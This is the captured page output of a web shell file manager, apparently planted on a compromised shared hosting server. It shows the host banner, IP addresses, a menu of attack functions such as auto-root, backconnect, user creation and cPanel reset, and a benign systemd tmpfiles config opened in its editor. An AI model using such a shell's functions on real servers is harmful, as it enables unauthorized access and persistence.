Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
lib /
tmpfiles.d /
[ HOME SHELL ]
Name
Size
Permission
Action
apache2.conf
81
B
-rw-r--r--
bird.conf
26
B
-rw-r--r--
cl-MariaDB1104.conf
75
B
-rw-r--r--
cryptsetup.conf
35
B
-rw-r--r--
dbus.conf
365
B
-rw-r--r--
dnf.conf
188
B
-rw-r--r--
ea-ruby27-passenger.conf
48
B
-rw-r--r--
etc.conf
515
B
-rw-r--r--
home.conf
362
B
-rw-r--r--
iptraf-ng.conf
35
B
-rw-r--r--
journal-nocow.conf
1.07
KB
-rw-r--r--
legacy.conf
841
B
-rw-r--r--
libselinux.conf
30
B
-rw-r--r--
man-db.conf
35
B
-rw-r--r--
mariadb.conf
443
B
-rw-r--r--
named.conf
32
B
-rw-r--r--
nrpe.conf
29
B
-rw-r--r--
nscd.conf
27
B
-rw-r--r--
openssh.conf
34
B
-rw-r--r--
pam.conf
129
B
-rw-r--r--
portables.conf
96
B
-rw-r--r--
postgresql.conf
43
B
-rw-r--r--
puppet-agent.conf
35
B
-rw-r--r--
rpcbind.conf
87
B
-rw-r--r--
rpm.conf
22
B
-rw-r--r--
screen.conf
64
B
-rw-r--r--
selinux-policy.conf
137
B
-rw-r--r--
sudo.conf
305
B
-rw-r--r--
systemd-nologin.conf
596
B
-rw-r--r--
systemd-pstore.conf
1.47
KB
-rw-r--r--
systemd.conf
1.64
KB
-rw-r--r--
tmp.conf
757
B
-rw-r--r--
tuned.conf
56
B
-rw-r--r--
var.conf
568
B
-rw-r--r--
x11.conf
655
B
-rw-r--r--
zabbix-agent.conf
37
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : systemd-pstore.conf
# SPDX-License-Identifier: LGPL-2.1+ # # The systemd-pstore.service(1) archives the contents of /sys/fs/pstore # upon boot so that there is room for a subsequent dump. This service # is enabled with: # systemctl enable systemd-pstore # # With the service enabled, the kernel still needs to be configured # to write data into the pstore. The kernel has two parameters, # crash_kexec_post_notifiers and printk.always_kmsg_dump, that # control writes into pstore. # # The crash_kexec_post_notifiers parameter enables the kernel to write # dmesg (including stack trace) into pstore upon a panic even if kdump # is loaded, only needed if you want to use pstore with kdump. Without # this parameter, kdump could block writing to pstore for stability # reason. Note this increases the risk of kdump failure even if pstore # is not available. # # The printk.always_kmsg_dump parameter enables the kernel to write dmesg # upon a normal shutdown (shutdown, reboot, halt). # # To configure the kernel parameters, uncomment the appropriate # line(s) below. The value written is either 'Y' to enable the # kernel parameter, or 'N' to disable the kernel parameter. # # After making a change to this file, do: # systemd-tmpfiles --create path/to/tmpfiles.d/systemd-pstore.conf # # These changes are automatically applied on future re-boots. d /var/lib/systemd/pstore 0755 root root 14d #w- /sys/module/printk/parameters/always_kmsg_dump - - - - Y #w- /sys/module/kernel/parameters/crash_kexec_post_notifiers - - - - Y
Close